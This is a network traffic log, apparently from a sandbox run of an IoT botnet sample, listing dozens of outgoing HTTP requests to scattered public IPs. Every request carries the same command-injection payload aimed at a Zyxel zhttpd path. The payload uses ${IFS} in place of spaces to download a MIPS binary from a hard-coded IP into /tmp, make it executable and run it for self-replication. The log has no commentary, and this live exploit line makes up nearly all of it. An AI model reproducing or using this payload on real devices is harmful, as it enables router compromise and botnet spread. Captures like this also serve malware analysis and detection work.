                                                  Jan 19, 2024 18:24:05.238702059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6638192.168.2.136062613.199.15.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238750935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6639192.168.2.1353052169.9.114.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238821983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6640192.168.2.1338696150.38.138.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238864899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6641192.168.2.1351500196.116.96.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238905907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6642192.168.2.1337696136.6.14.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238934040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6643192.168.2.1339900128.60.71.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238965034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6644192.168.2.1355928163.190.21.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239020109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6645192.168.2.1342856184.165.250.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239052057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6646192.168.2.1354656154.141.212.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239099026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6647192.168.2.1347060141.190.229.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239125967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6648192.168.2.134557698.251.220.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239181042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6649192.168.2.1356464117.59.49.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239196062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6650192.168.2.133726887.28.162.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239247084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6651192.168.2.1350174211.249.235.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239301920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6652192.168.2.1339846181.112.7.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239329100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6653192.168.2.1334004189.184.137.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239356995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6654192.168.2.1332858140.77.214.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239389896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6655192.168.2.134058861.32.188.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239438057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6656192.168.2.1351960158.169.54.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239465952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6657192.168.2.1336296196.23.9.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239515066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6658192.168.2.1351342166.123.88.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239547968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6659192.168.2.1349358115.246.196.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239600897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6660192.168.2.134670676.242.152.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239643097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6661192.168.2.135912612.134.175.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239666939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6662192.168.2.1354690130.64.159.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239703894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6663192.168.2.1354970135.59.4.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239733934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6664192.168.2.134616473.60.194.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239784002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6665192.168.2.13432041.175.171.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239820957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6666192.168.2.1342780105.211.152.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239851952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6667192.168.2.1349938182.64.195.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239911079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6668192.168.2.135167692.118.46.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239964962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6669192.168.2.133388650.46.112.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.239994049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6670192.168.2.1347288207.120.52.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240047932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6671192.168.2.1360572181.190.44.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240081072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6672192.168.2.1355298165.197.248.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240130901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6673192.168.2.1333910165.36.92.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240156889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6674192.168.2.1352286136.219.221.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240209103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6675192.168.2.1336424188.101.235.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240253925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6676192.168.2.1353606204.150.15.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240303993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6677192.168.2.1342962154.196.220.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240346909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6678192.168.2.133531838.104.31.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240371943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6679192.168.2.1334550165.195.147.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240412951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6680192.168.2.135059031.214.85.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240472078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6681192.168.2.133631099.34.42.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240526915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6682192.168.2.1352946217.50.204.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240565062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6683192.168.2.135417645.241.249.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240612984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6684192.168.2.1360128189.217.118.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240668058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6685192.168.2.1336778131.59.66.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240710974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6686192.168.2.1342570166.47.163.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240746021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6687192.168.2.134964091.255.211.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240772009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6688192.168.2.1348212169.121.229.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240829945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6689192.168.2.1345720190.92.202.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240864038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6690192.168.2.1358630166.96.74.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240904093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6691192.168.2.135222299.109.150.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240950108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6692192.168.2.133555247.254.240.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.240989923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6693192.168.2.1352252134.209.77.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241019011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6694192.168.2.1353132142.75.83.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241065979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6695192.168.2.134562893.23.126.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241122961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6696192.168.2.134437017.61.8.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241179943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6697192.168.2.1355104116.161.27.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241236925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6698192.168.2.1338806136.25.198.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241256952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6699192.168.2.13375384.232.143.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241301060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6700192.168.2.1351194108.178.44.159443
                                                  TimestampBytes transferredDirectionData
